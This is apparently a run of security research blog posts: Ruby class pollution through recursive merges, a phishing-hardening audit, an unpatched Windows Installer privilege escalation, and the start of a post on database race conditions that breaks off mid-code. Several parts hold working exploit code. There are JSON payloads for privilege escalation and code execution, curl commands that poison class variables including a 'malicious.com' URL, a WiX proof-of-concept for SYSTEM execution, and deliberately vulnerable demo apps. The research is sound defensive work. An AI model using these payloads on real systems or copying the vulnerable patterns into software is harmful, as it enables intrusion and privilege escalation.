Class Pollution in Ruby: A Deep Dive into Exploiting Recursive Merges

Introduction

In this post, we are going to explore a rarely discussed class of vulnerabilities in Ruby, known as class pollution. This concept is inspired by the idea of prototype pollution in JavaScript, where recursive merges are exploited to poison the prototype of objects, leading to unexpected behaviors. This idea was initially discussed in a blog post about prototype pollution in Python, in which the researcher used recursive merging to poison class variables and eventually global variables via the __globals__ attribute.

In Ruby, we can categorize class pollution into three main cases:

  1. Merge on Hashes: In this scenario, class pollution isn’t possible because the merge operation is confined to the hash itself.

  2. Merge on Attributes (Non-Recursive): Here, we can poison the instance variables of an object, potentially replacing methods by injecting return values. This pollution is limited to the object itself and does not affect the class.

current_obj.instance_variable_set("@#{key}", new_object)
current_obj.singleton_class.attr_accessor key
  1. Merge on Attributes (Recursive): In this case, the recursive nature of the merge allows us to escape the object context and poison attributes or methods of parent classes or even unrelated classes, leading to a broader impact on the application.

Merge on Attributes

Let’s start by examining a code example where we exploit a recursive merge to modify object methods and alter the application’s behavior. This type of pollution is limited to the object itself.

require 'json'


# Base class for both Admin and Regular users
class Person

  attr_accessor :name, :age, :details

  def initialize(name:, age:, details:)
    @name = name
    @age = age
    @details = details
  end

  # Method to merge additional data into the object
  def merge_with(additional)
    recursive_merge(self, additional)
  end

  # Authorize based on the `to_s` method result
  def authorize
    if to_s == "Admin"
      puts "Access granted: #{@name} is an admin."
    else
      puts "Access denied: #{@name} is not an admin."
    end
  end

  # Health check that executes all protected methods using `instance_eval`
  def health_check
    protected_methods().each do |method|
      instance_eval(method.to_s)
    end
  end

  private

  def recursive_merge(original, additional, current_obj = original)
    additional.each do |key, value|

      if value.is_a?(Hash)
        if current_obj.respond_to?(key)
          next_obj = current_obj.public_send(key)
          recursive_merge(original, value, next_obj)
        else
          new_object = Object.new
          current_obj.instance_variable_set("@#{key}", new_object)
          current_obj.singleton_class.attr_accessor key
        end
      else
        current_obj.instance_variable_set("@#{key}", value)
        current_obj.singleton_class.attr_accessor key
      end
    end
    original
  end

  protected

  def check_cpu
    puts "CPU check passed."
  end

  def check_memory
    puts "Memory check passed."
  end
end

# Admin class inherits from Person
class Admin < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)
  end

  def to_s
    "Admin"
  end
end

# Regular user class inherits from Person
class User < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)
  end

  def to_s
    "User"
  end
end

class JSONMergerApp
  def self.run(json_input)
    additional_object = JSON.parse(json_input)

    # Instantiate a regular user
    user = User.new(
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"
        }
      }
    )


    # Perform a recursive merge, which could override methods
    user.merge_with(additional_object)

    # Authorize the user (privilege escalation vulnerability)
    # ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    user.authorize

    # Execute health check (RCE vulnerability)
    # ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    user.health_check

  end
end

if ARGV.length != 1
  puts "Usage: ruby class_pollution.rb 'JSON_STRING'"
  exit
end

json_input = ARGV[0]
JSONMergerApp.run(json_input)

In the provided code, we perform a recursive merge on the attributes of the User object. This allows us to inject or override values, potentially altering the object’s behavior without directly modifying the class definition.

How It Works:

  1. Initialization and Setup:
    • The User object is initialized with specific attributes: name, age, and details. These attributes are stored as instance variables within the object.
  2. Merge:
    • The merge_with method is called with a JSON input that represents the additional data to be merged into the User object.
  3. Altering Object Behavior:
    • By passing carefully crafted JSON data, we can modify or inject new instance variables that affect how the User object behaves.
    • For example, in the authorize method, the to_s method determines whether the user is granted admin privileges. By injecting a new to_s method with a return value of "Admin", we can escalate the user’s privileges.
    • Similarly, in the health_check method, we can inject arbitrary code execution by overriding methods that are called via instance_eval.

Example Exploits:

  • Privilege Escalation: ruby class_pollution.rb {"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}
    • This injects a new to_s method that returns "Admin", granting the user unauthorized admin privileges.
  • Remote Code Execution: ruby class_pollution.rb {"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}
    • This injects a new method into the protected_methods list, which is then executed by instance_eval, allowing arbitrary code execution.

Class Pollution Gadgets

Limitations:

  • The aforementioned changes are limited to the specific object instance and do not affect other instances of the same class. This means that while the object’s behavior is altered, other objects of the same class remain unaffected.

This example highlights how seemingly innocuous operations like recursive merges can be leveraged to introduce severe vulnerabilities if not properly managed. By understanding these risks, developers can better protect their applications from such exploits.

Real-World Cases

Next, we’ll explore two of the most popular libraries for performing merges in Ruby and see how they might be vulnerable to class pollution. It’s important to note that there are other libraries potentially affected by this class of issues and the overall impact of these vulnerabilities varies.

1. ActiveSupport’s deep_merge

ActiveSupport, a built-in component of Ruby on Rails, provides a deep_merge method for hashes. By itself, this method isn’t exploitable given it is limited to hashes. However, if used in conjunction with something like the following, it could become vulnerable:

# Method to merge additional data into the object using ActiveSupport deep_merge
def merge_with(other_object)
merged_hash = to_h.deep_merge(other_object)

merged_hash.each do |key, value|
  self.class.attr_accessor key
  instance_variable_set("@#{key}", value)
end

self
end

In this example, if the deep_merge is used as shown, we can exploit it similarly to the first example, leading to potentially dangerous changes in the application’s behavior.

Active Support Class Pollution

2. Hashie

The Hashie library is widely used for creating flexible data structures in Ruby, offering features such as deep_merge. However, unlike the previous example with ActiveSupport, Hashie’s deep_merge method operates directly on object attributes rather than plain hashes. This makes it more susceptible to attribute poisoning.

Hashie has a built-in mechanism that prevents the direct replacement of methods with attributes during a merge. Normally, if you try to override a method with an attribute via deep_merge, Hashie will block the attempt and issue a warning. However, there are specific exceptions to this rule: attributes that end with _, !, or ? can still be merged into the object, even if they conflict with existing methods.

Key Points

  1. Method Protection: Hashie protects method names from being directly overridden by attributes ending in _, !, or ?. This means that, for example, trying to replace a to_s method with a to_s_ attribute will not raise an error, but the method will not be replaced either. The value of to_s_ will not override the method behavior, ensuring that existing method functionality remains intact. This protection mechanism is crucial to maintaining the integrity of methods in Hashie objects.

  2. Special Handling of _: The key vulnerability lies in the handling of _ as an attribute on its own. In Hashie, when you access _, it returns a new Mash object (essentially a temporary object) of the class you are interacting with. This behavior allows attackers to access and work with this new Mash object as if it were a real attribute. While methods cannot be replaced, this feature of accessing the _ attribute can still be exploited to inject or modify values.

    For example, by injecting "_": "Admin" into the Mash, an attacker could trick the application into accessing the temporary Mash object created by _, and this object can contain maliciously injected attributes that bypass protections.

A Practical Example

Consider the following code:

require 'json'
require 'hashie'

# Base class for both Admin and Regular users
class Person < Hashie::Mash

  # Method to merge additional data into the object using hashie
  def merge_with(other_object)
    deep_merge!(other_object)
    self
  end

  # Authorize based on to_s
  def authorize
    if _.to_s == "Admin"
      puts "Access granted: #{@name} is an admin."
    else
      puts "Access denied: #{@name} is not an admin."
    end
  end

end

# Admin class inherits from Person
class Admin < Person
  def to_s
    "Admin"
  end
end

# Regular user class inherits from Person
class User < Person
  def to_s
    "User"
  end
end

class JSONMergerApp
  def self.run(json_input)
    additional_object = JSON.parse(json_input)

    # Instantiate a regular user
    user = User.new({
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"
        }
      }
    })

    # Perform a deep merge, which could override methods
    user.merge_with(additional_object)

    # Authorize the user (privilege escalation vulnerability)
    # Exploit: If we pass {"_": "Admin"} in the JSON, the user will be treated as an admin.
    # Example usage: ruby hashie.rb '{"_": "Admin", "name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    user.authorize
  end
end

if ARGV.length != 1
  puts "Usage: ruby hashie.rb 'JSON_STRING'"
  exit
end

json_input = ARGV[0]
JSONMergerApp.run(json_input)

In the provided code, we are exploiting Hashie’s handling of _ to manipulate the behavior of the authorization process. When _.to_s is called, instead of returning the method-defined value, it accesses a newly created Mash object, where we can inject the value "Admin". This allows an attacker to bypass method-based authorization checks by injecting data into the temporary Mash object.

For example, the JSON payload {"_": "Admin"} injects the string “Admin” into the temporary Mash object created by _, allowing the user to be granted admin access through the authorize method even though the to_s method itself hasn’t been directly overridden.

This vulnerability highlights how certain features of the Hashie library can be leveraged to bypass application logic, even with protections in place to prevent method overrides.

Hashie Support Class Pollution

Escaping the Object to Poison the Class

When the merge operation is recursive and targets attributes, it’s possible to escape the object context and poison attributes or methods of the class, its parent class, or even other unrelated classes. This kind of pollution affects the entire application context and can lead to severe vulnerabilities.

require 'json'
require 'sinatra/base'
require 'net/http'

# Base class for both Admin and Regular users
class Person
  @@url = "http://default-url.com"

  attr_accessor :name, :age, :details

  def initialize(name:, age:, details:)
    @name = name
    @age = age
    @details = details
  end

  def self.url
    @@url
  end

  # Method to merge additional data into the object
  def merge_with(additional)
    recursive_merge(self, additional)
  end

  private

  # Recursive merge to modify instance variables
  def recursive_merge(original, additional, current_obj = original)
    additional.each do |key, value|
      if value.is_a?(Hash)
        if current_obj.respond_to?(key)
          next_obj = current_obj.public_send(key)
          recursive_merge(original, value, next_obj)
        else
          new_object = Object.new
          current_obj.instance_variable_set("@#{key}", new_object)
          current_obj.singleton_class.attr_accessor key
        end
      else
        current_obj.instance_variable_set("@#{key}", value)
        current_obj.singleton_class.attr_accessor key
      end
    end
    original
  end
end

class User < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)
  end
end

# A class created to simulate signing with a key, to be infected with the third gadget
class KeySigner
  @@signing_key = "default-signing-key"

  def self.signing_key
    @@signing_key
  end

  def sign(signing_key, data)
    "#{data}-signed-with-#{signing_key}"
  end
end

class JSONMergerApp < Sinatra::Base
  # POST /merge - Infects class variables using JSON input
  post '/merge' do
    content_type :json
    json_input = JSON.parse(request.body.read)

    user = User.new(
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"
        }
      }
    )

    user.merge_with(json_input)

    { status: 'merged' }.to_json
  end

  # GET /launch-curl-command - Activates the first gadget
  get '/launch-curl-command' do
    content_type :json

    # This gadget makes an HTTP request to the URL stored in the User class
    if Person.respond_to?(:url)
      url = Person.url
      response = Net::HTTP.get_response(URI(url))
      { status: 'HTTP request made', url: url, response_body: response.body }.to_json
    else
      { status: 'Failed to access URL variable' }.to_json
    end
  end

  # Curl command to infect User class URL:
  # curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://example.com"}}}' http://localhost:4567/merge

  # GET /sign_with_subclass_key - Signs data using the signing key stored in KeySigner
  get '/sign_with_subclass_key' do
    content_type :json

    # This gadget signs data using the signing key stored in KeySigner class
    signer = KeySigner.new
    signed_data = signer.sign(KeySigner.signing_key, "data-to-sign")

    { status: 'Data signed', signing_key: KeySigner.signing_key, signed_data: signed_data }.to_json
  end

  # Curl command to infect KeySigner signing key (run in a loop until successful):
  # for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge; done

  # GET /check-infected-vars - Check if all variables have been infected
  get '/check-infected-vars' do
    content_type :json

    {
      user_url: Person.url,
      signing_key: KeySigner.signing_key
    }.to_json
  end

  run! if app_file == $0
end

In the following example, we demonstrate two distinct types of class pollution:

  1. (A) Poisoning the Parent Class: By recursively merging attributes, we can modify variables in the parent class. This modification impacts all instances of that class and can lead to unintended behavior across the application.

  2. (B) Poisoning Other Classes: By brute-forcing subclass selection, we can eventually target and poison specific classes. This approach involves repeatedly attempting to poison random subclasses until the desired one is infected. While effective, this method can cause issues due to the randomness and potential for over-infection.

Detailed Explanation of Both Exploits

(A) Poisoning the Parent Class

In this exploit, we use a recursive merge operation to modify the @@url variable in the Person class, which is the parent class of User. By injecting a malicious URL into this variable, we can manipulate subsequent HTTP requests made by the application.

For example, using the following curl command:

curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://malicious.com"}}}' http://localhost:4567/merge

We successfully poison the @@url variable in the Person class. When the /launch-curl-command endpoint is accessed, it now sends a request to http://malicious.com instead of the original URL.

This demonstrates how recursive merges can escape the object level and modify class-level variables, affecting the entire application.

Class Pollution Curl Gadget

(B) Poisoning Other Classes

This exploit leverages brute-force to infect specific subclasses. By repeatedly attempting to inject malicious data into random subclasses, we can eventually target and poison the KeySigner class, which is responsible for signing data.

For example, using the following looped curl command:

for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge --silent > /dev/null; done

We attempt to poison the @@signing_key variable in KeySigner. After several attempts, the KeySigner class is infected, and the signing key is replaced with our injected key.

This exploit highlights the dangers of recursive merges combined with brute-force subclass selection. While effective, this method can cause issues due to its aggressive nature, potentially leading to the over-infection of classes.

Class Pollution Sign Gadget

In the latter examples, we set up an HTTP server to demonstrate how the infected classes remain poisoned across multiple HTTP requests. The persistent nature of these infections shows that once a class is poisoned, the entire application context is compromised, and all future operations involving that class will behave unpredictably.

The server setup also allowed us to easily check the state of these infected variables via specific endpoints. For example, the /check-infected-vars endpoint outputs the current values of the @@url and @@signing_key variables, confirming whether the infection was successful.

This approach clearly shows how class pollution in Ruby can have lasting and far-reaching consequences, making it a critical area to secure.

Conclusion

The research conducted here highlights the risks associated with class pollution in Ruby, especially when recursive merges are involved. These vulnerabilities are particularly dangerous because they allow attackers to escape the confines of an object and manipulate the broader application context. By understanding these mechanisms and carefully considering how data merges are handled, it is possible to mitigate the risk of class pollution in Ruby applications.

We’re hiring!

We are a small highly focused team. We love what we do and we routinely take on difficult engineering challenges to help our customers build with security. If you’ve enjoyed this research, consider applying via our careers portal to spend up to 11 weeks/year on research projects like this one!


Applying Security Engineering to Make Phishing Harder - A Case Study

Introduction

Recently Doyensec was hired by a client offering a “Communication Platform as a Service”. This platform allows their clients to craft a customer service experience and to communicate with their own customers via a plethora of channels: email, web chats, social media and more.

While undoubtedly valuable, such a service introduces a unique threat model. Our client’s users work with a vast amount of incoming correspondence from outside (often anonymous) users, on a daily basis. This makes them particularly vulnerable to phishing and other social engineering attacks.

While such threats cannot be fully eliminated, it is possible to minimize the possibilities for exploitation. Recognizing this, Doyensec was hired to performed a security review, specifically focused on social engineering attacks and phishing in particular. The engagement, performed earlier this year, has proven to be extremely valuable for both parties. Most importantly, our client used to the results to greatly increase their platform’s resilience against social engineering attacks. Additionally, Doyensec engineers had a great opportunity to unleash their creativity on bugs that are often overlooked, or at least heavily undervalued (looking at you, CVSS score!), during standard security audits as well as the opportunity to look at defending the application from a blue-team perspective.

The following case study will discuss some of the vulnerabilities that were addressed as part of this audit. Hopefully, this post will be useful for developers to understand what kind of vulnerabilities can be lurking in their platforms too. It also helps to demonstrate how valuable such focused engagements can be as an addition to standard web engagements.

Attachments Handling

For any customer support organization, file attachment management is a crucial feature. On one hand, it is crucial for users to be able to share file samples, screenshots, etc. with their interlocutors. On the other hand, sharing files is always a hotbed for exploiting all manner of security bugs, especially when accepting files from untrusted parties. Therefore, hardening this part of the application will always require careful considerations as to how to ensure confidentiality and integrity without sacrificing usability.

File Extension Restriction Bypass via Trailing Period

The tested platform employs a robust system designed to validate allowed file extensions and content types for file uploads, featuring a global ban list for inherently dangerous file types, such as executables (e.g., .exe). These measures are intended to prevent the uploading and distribution of potentially malicious files. However, by exploiting some browsers’ quirks, a vulnerability was discovered that allowed users to bypass these restrictions simply by appending a trailing period (“dangling dot”) to the file extension.

It was possible to bypass this file extension restriction by crafting an upload request with a prohibited extension, such as .exe.. This resulted in the system accepting the file, since it ostensibly met the criteria for allowed uploads - which included an empty extension. However, Firefox and Chromium-based browsers remove the dangling dot (interestingly, Safari retains it). As a result, the file was saved with an original .exe extension on the victim’s filesystem:

Dangling Dot Download Result

The recommendation is simple here. Trailing dots should be removed from the filenames. It rarely has any use in real-world scenarios, therefore the usability tradeoff is minimal.

Circumvention of Content Origin Restrictions via Subdomain Crafting

Platform chats have been created with a restriction, which allows link attachments from our client’s subdomains only. This security control is designed to restrict uploads and references to images and attachments to a predefined set of origins, preventing the use of external sources that could be employed in phishing attacks. The intended validation process relies on an allowlist of domains.

However, when validating (sub)domains using regular expressions, it’s easy to forget the intricacies of this syntax, which can lead to hard-to-spot bypasses.

Doyensec observed that subdomains were matched using an allowlist of regular expressions similar to /acme-attachments-1.com/. Such a regular expression does not enforce the beginning and the end of the string and will therefore accept any domains that contain the desired subdomain. An attacker could create a subdomain similar to acme-attachments-1.com.doyensec.com, which would be accepted despite this security mechanism.

Another common (although not exploitable in this case) mistake is forgetting that the dot (.) character is treated as a wildcard by regular expressions. When one forgets to escape a dot in a domain regex, an attacker can register a domain which will bypass such a restriction. For instance, a regular expression similar to downloads.acmecdn.com would accept an attacker-controlled domain like downloadsAacmecdn.com.

It is worth noting that as innocuous as this vulnerability seems to be, it actually has great potential for creating successful phishing attacks. When a victim receives an attachment in a trusted platform, they’re far more likely to follow the link. Also, a login page would not be surprising for a victim, further increasing the likelihood of them giving away their credentials.

Antivirus Scan Bypass

The platform appropriately implements antivirus scanning on all incoming files. However, an attacker could obfuscate the true content of the payload by creating an encrypted archive: $ zip -e test_encrypted.zip eicar.com.

There is no simple solution to solve this issue. Banning encrypted archives altogether is a usability trade-off that might be unacceptable in some cases. Doyensec recommended clearly warning users against opening encrypted files at the very least. It might be also useful to allow the clients to choose which side of this trade-off is acceptable for them by creating a proper configuration switch.

HTML Input Handling

When it comes to exchanging messages, it can be very useful to add formatting and give users more ways of expressing themselves. On the other hand, when messages are coming from untrusted sources, such a feature can enable attackers to craft sophisticated attacks that involve UI redressing, e.g., emulating UI elements within their messages.

Our client has found a great way to balance usability and security. While trusted users have a rich choice of input formatting options, untrusted users from outside the platform can only share basic plain-text messages. It also worth noting that even trusted users can’t inject arbitrary HTML to their messages, given that HTML tags are properly parsed and encoded. There are however specific tags that are allowed and, in some cases, converted into more elaborate elements (e.g., link tags get converted into buttons).

Doyensec found this solution well-architected at the design level. However, due to an oversight in the implementation, the public messaging API also accepted a “hidden” (not used by the frontend) parameter which allowed some HTML elements. Doyensec was able to exploit the conversion of links into buttons to demonstrate the potential for UI elements to be spoofed using this vulnerability.

HTML Injection Body Parameter

The issue was resolved by completely disabling this parameter in the public API, only allowing authenticated users to format their messages.

Links Presentation Bugs

Data presentation bugs are a threat that is especially overlooked. Despite their potential to manipulate or distort critical information, data presentation bugs are frequently underestimated in security assessments and overlooked in the prioritization of remediation efforts. However, their exploitation can lead to serious consequences including phishing.

Misleading Unicode Domain Rendering

To understand this issue, it is important to understand two different terms. First, Punycode which is a character encoding scheme used to represent Unicode characters in domain names. It enables browsers and other web clients to handle Unicode in domain names. Secondly, we have homoglyphs, which are characters that look very similar to each other, but have different codes. While being visually indistinguishable, consider that the characters ‘a’ (code: 0x61) and ‘а’ (code: 0x430) are actually two different characters leading to two different domains when used in a URL.

One of the most prominent examples of this threat was created by the researcher Xudong Zheng. This researcher created a link that looks deceivingly similar to the widely trusted www.apple.com domain. However, the link https://www.аррӏе.com actually resolves to www.xn--80ak6aa92e.com, after unrolling the Punycode string. Visiting the link reveals that it is not controlled by Apple, despite its convincing appearance:

Example Punycode Domain Screenshot

To protect users from these types of issues, we recommended rendering Unicode domains in Punycode format. This way users are not deceived in regards to where the given link leads.

URI and Filename Spoofing via RTLO Injection

Using the Right-To-Left Override (RTLO) character is another technique for manipulating the way links are displayed. The RTLO character changes the order in which consecutive characters are rendered. When it comes to filenames and URLs, their structures are fixed and the character order matters. Therefore, flipping the character order is an effective way of obscuring the true target of the link, or the extension of a file.

Sound complicated? An example will clear it up. Consider the link to an attacker-controlled domain: https://gepj.net/selif#/moc.rugmi It looks suspicious, however when prepended with the RTLO Unicode character ([U+202E]https://gepj.net/selif#/moc.rugmi) it’ll render in the following way:

Example RTLO Domain

A displayed file extensions can be manipulated in a similar manner:

Consider a file named test.[U+202E]fdp.zip:

Example RTLO Filename

The proposed solution here is simple - stricter filtering. URLs should not be rendered as links when the character order is changed. Similarly, filenames containing character flow manipulators should be rejected.

Even when the links are always properly displayed, there still remains a chance that an attacker can create a successful phishing campaign. After all, users could always get coerced into following a malicious link. Such a risk cannot be fully eliminated, but it can be mitigated with additional hardening. The examined platform implements navigation confirmation interstitials. This means, that anytime a user follows a link outside of the platform, an additional confirmation screen will appear. Such UI elements inform the user that they’re leaving a safe environment. This UX design greatly decreases the chances of a successful phishing attack.

Summary

This project is a great example of a proactive engagement against specific threats. Given the particular threat model of this platform, such an engagement has proven extremely useful as an addition to regular security assessments and their bug bounty program. In particular, an engagement specifically focused on phishing and social engineering allowed us to craft a list of recommendations and hardening ideas that would have otherwise just been a side note in a regular security review.


Windows Installer, Exploiting Custom Actions

Over a year ago, I published my research around the Windows Installer Service. The article explained in detail how the MSI repair process executes in an elevated context, but the lack of impersonation could lead to Arbitrary File Delete and similar issues. The issue was acknowledged by Microsoft (as CVE-2023-21800), but it was never directly fixed. Instead, the introduction of a Redirection Guard mitigated all symlink attacks in the context of the msiexec process. Back then, I wasn’t particularly happy with the solution, but I couldn’t find any bypass.

The Redirection Guard turned out to work exactly as intended, so I spent some time attacking the Windows Installer Service from other angles. Some bugs were found (CVE-2023-32016), but I always felt that the way Microsoft handled the impersonation issue wasn’t exactly right. That unfixed behavior became very useful during another round of research.

This article describes the unpatched vulnerability affecting the latest Windows 11 versions. It illustrates how the issue can be leveraged to elevate a local user’s privileges. The bug submission was closed after half-a-year of processing, as non-reproducible. I will demonstrate how the issue can be reproduced by anyone else.

Custom Actions

Custom Actions in the Windows Installer world are user-defined actions that extend the functionality of the installation process. Custom Actions are necessary in scenarios where the built-in capabilities of Windows Installer are insufficient. For example, if an application requires specific registry keys to be set dynamically based on the user’s environment, a Custom Action can be used to achieve this. Another common use case is when an installer needs to perform complex tasks like custom validations or interactions with other software components that cannot be handled by standard MSI actions alone.

Overall, Custom Actions can be implemented in different ways, such as:

  • Compiled to custom DLLs using the exposed C/C++ API
  • Inline VBScript or JScript snippets within the WSX file
  • Explicitly calling system commands within the WSX file

All of the above methods are affected, but for simplicity, we will focus on the last type.

Let’s take a look at an example WSX file (poc.wsx) containing some Custom Actions:

<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
    <Product Id="{12345678-9259-4E29-91EA-8F8646930000}" Language="1033" Manufacturer="YourCompany" Name="HelloInstaller" UpgradeCode="{12345678-9259-4E29-91EA-8F8646930001}" Version="1.0.0.0">
        <Package Comments="This installer database contains the logic and data required to install HelloInstaller." Compressed="yes" Description="HelloInstaller" InstallerVersion="200" Languages="1033" Manufacturer="YourCompany" Platform="x86" ReadOnly="no" />

        <CustomAction Id="SetRunCommand" Property="RunCommand" Value="&quot;[%USERPROFILE]\test.exe&quot;" Execute="immediate" />
        <CustomAction Id="RunCommand" BinaryKey="WixCA" DllEntry="WixQuietExec64" Execute="commit" Return="ignore" Impersonate="no" />
        <Directory Id="TARGETDIR" Name="SourceDir">
            <Directory Id="ProgramFilesFolder">
                <Directory Id="INSTALLFOLDER" Name="HelloInstaller" ShortName="krp6fjyg">
                    <Component Id="ApplicationShortcut" Guid="{12345678-9259-4E29-91EA-8F8646930002}" KeyPath="yes">
                        <CreateFolder Directory="INSTALLFOLDER" />
                    </Component>
                </Directory>
            </Directory>
        </Directory>
        <Property Id="ALLUSERS" Value="1" />
        <Feature Id="ProductFeature" Level="1" Title="Main Feature">
            <ComponentRef Id="ApplicationShortcut" />
        </Feature>
        <MajorUpgrade DowngradeErrorMessage="A newer version of [ProductName] is already installed." Schedule="afterInstallValidate" />

        <InstallExecuteSequence>
            <Custom Action="SetRunCommand" After="InstallInitialize">1</Custom>
            <Custom Action="RunCommand" After="SetRunCommand">1</Custom>
        </InstallExecuteSequence>
    </Product>
</Wix>

This looks like a perfectly fine WSX file. It defines the InstallExecuteSequence, which consists of two custom actions. The SetRunCommand is queued to run right after the InstallInitialize event. Then, the RunCommand should start right after SetRunCommand finishes.

The SetRunCommand action simply sets the value of the RunCommand property. The [%USERPROFILE] string will be expanded to the path of the current user’s profile directory. This is achieved by the installer using the value of the USERPROFILE environment variable. The expansion process involves retrieving the environment variable’s value at runtime and substituting [%USERPROFILE] with this value.

The second action, also called RunCommand, uses the RunCommand property and executes it by calling the WixQuietExec64 method, which is a great way to execute the command quietly and securely (without spawning any visible windows). The Impersonate="no" option enables the command to execute with LocalSystem’s full permissions.

On a healthy system, the administrator’s USERPROFILE directory cannot be accessed by any less privileged users. Whatever file is executed by the RunCommand shouldn’t be directly controllable by unprivileged users.

We covered a rather simple example. Implementing the intended Custom Action is actually quite complicated. There are many mistakes that can be made. The actions may rely on untrusted resources, they can spawn hijackable console instances, or run with more privileges than necessary. These dangerous mistakes may be covered in future blogposts.

Testing the Installer

Having the WiX Toolset at hand, we can turn our XML into an MSI file. Note that we need to enable the additional WixUtilExtension to use the WixCA:

candle .\poc.wxs 
light .\poc.wixobj -ext WixUtilExtension.dll

The poc.msi file should be created in the current directory.

According to our WSX file above, once the installation is initialized, our Custom Action should run the "[%USERPROFILE]\test.exe" file. We can set up a ProcMon filter to look for that event. Remember to also enable the “Integrity” column.

Procmon filters settings

We can install the application using any Admin account (the Almighty user here)

msiexec /i C:\path\to\poc.msi

ProcMon should record the CreateFile event. The file was not there, so additional file extensions were tried.

NAME NOT FOUND event for the almighty user

The same sequence of actions can be reproduced by running an installation repair process. The command can point at the specific C:/Windows/Installer/*.msi file or use a GUID that we defined in a WSX file:

msiexec /fa {12345678-9259-4E29-91EA-8F8646930000}

The result should be exactly the same if the Almighty user triggered the repair process.

On the other hand, note what happens if the installation repair was started by another unprivileged user: lowpriv.

NAME NOT FOUND event for the lowpriv user

It is the user’s environment that sets the executable path, but the command still executes with System level integrity, without any user impersonation! This leads to a straightforward privilege escalation.

As a final confirmation, the lowpriv user would plant an add-me-as-admin type of payload under the C:/Users/lowpriv/test.exe path. The installation process will not finish until the test.exe is running, handling that behavior is rather trivial, though.

Event details

Optionally, add /L*V log.txt to the repair command for a detailed log. The poisoned properties should be evident:

MSI (s) (98:B4) [02:01:33:733]: Machine policy value 'AlwaysInstallElevated' is 0
MSI (s) (98:B4) [02:01:33:733]: User policy value 'AlwaysInstallElevated' is 0
...
Action start 2:01:33: InstallInitialize.
MSI (s) (98:B4) [02:01:33:739]: Doing action: SetRunCommand
MSI (s) (98:B4) [02:01:33:739]: Note: 1: 2205 2:  3: ActionText
Action ended 2:01:33: InstallInitialize. Return value 1.
MSI (s) (98:B4) [02:01:33:740]: PROPERTY CHANGE: Adding RunCommand property. Its value is '"C:\Users\lowpriv\test.exe"'.
Action start 2:01:33: SetRunCommand.
MSI (s) (98:B4) [02:01:33:740]: Doing action: RunCommand
MSI (s) (98:B4) [02:01:33:740]: Note: 1: 2205 2:  3: ActionText
Action ended 2:01:33: SetRunCommand. Return value 1.

The Poisoned Variables

The repair operation in msiexec.exe can be initiated by a standard user, while automatically elevating its privileges to execute certain actions, including various custom actions defined in the MSI file. Notably, not all custom actions execute with elevated privileges. Specifically, an action must be explicitly marked as Impersonate="no", be scheduled between the InstallExecuteSequence and InstallFinalize events, and use either commit, rollback or deferred as the execution type to run elevated.

In the future, we may publish additional materials, including a toolset to hunt for affected installers that satisfy the above criteria.

Elevated custom actions may use environment variables as well as Windows Installer properties (see the full list of properties). I’ve observed the following properties can be “poisoned” by a standard user that invokes the repair process:

  • “AdminToolsFolder”
  • “AppDataFolder”
  • “DesktopFolder”
  • “FavoritesFolder”
  • “LocalAppDataFolder”
  • “MyPicturesFolder”
  • “NetHoodFolder”
  • “PersonalFolder”
  • “PrintHoodFolder”
  • “ProgramMenuFolder”
  • “RecentFolder”
  • “SendToFolder”
  • “StartMenuFolder”
  • “StartupFolder”
  • “TempFolder”
  • “TemplateFolder”

Additionally, the following environment variables are often used by software installers (this list is not exhaustive):

  • “APPDATA”
  • “HomePath”
  • “LOCALAPPDATA”
  • “TEMP”
  • “TMP” (Meanwhile, a separate patch introduced the SystemTemp concept and remediated these two variables. Thanks to @pfiatde for pointing it out!)
  • “USERPROFILE”

These values are typically utilized to construct custom paths or as system command parameters. Poisoned values can alter the command’s intent, potentially leading to a command injection vulnerability.

Note that the described issue is not exploitable on its own. The MSI file utilizing a vulnerable Custom Action must be already installed on the machine. However, the issue could be handy to pentesters performing Local Privilege Elevation or as a persistence mechanism.

Disclosure Timeline

The details of this issue were reported to the Microsoft Security Response Center on December 1, 2023. The bug was confirmed on the latest Windows Insider Preview build at the time of the reporting: 26002.1000.rs_prerelease.231118-1559.

Disclosure Timeline Status
12/01/2023 The vulnerability reported to Microsoft
02/09/2024 Additional details requested
02/09/2024 Additional details provided
05/09/2024 Issue closed as non-reproducible: “We completed the assessment and because we weren’t able to reproduce the issue with the repro steps provide _[sic]_. We don’t expect any further action on the case and we will proceed with closing out the case.”

We asked Microsoft to reopen the ticket and the blogpost draft was shared with Microsoft prior to the publication.

As of now, the issue is still not fixed. We confirmed that it is affecting the current latest Windows Insider Preview build 10.0.25120.751.


A Race to the Bottom - Database Transactions Undermining Your AppSec

Introduction

Databases are a crucial part of any modern application. Like any external dependency, they introduce additional complexity for the developers building an application. In the real world, however, they are usually considered and used as a black box which provides storage functionality.

This post aims shed light on a particular aspect of the complexity databases introduce which is often overlooked by developers, namely concurrency control. The best way to do that is to start off by looking at a fairly common code pattern we at Doyensec see in our day-to-day work:

func (db *Db) Transfer(source int, destination int, amount int) error {
  ctx := context.Background()

  conn, err := pgx.Connect(ctx, db.databaseUrl)
  defer conn.Close(ctx)

  // (1)
  tx, err := conn.BeginTx(ctx)

  var user User
  // (2)
  err = conn.
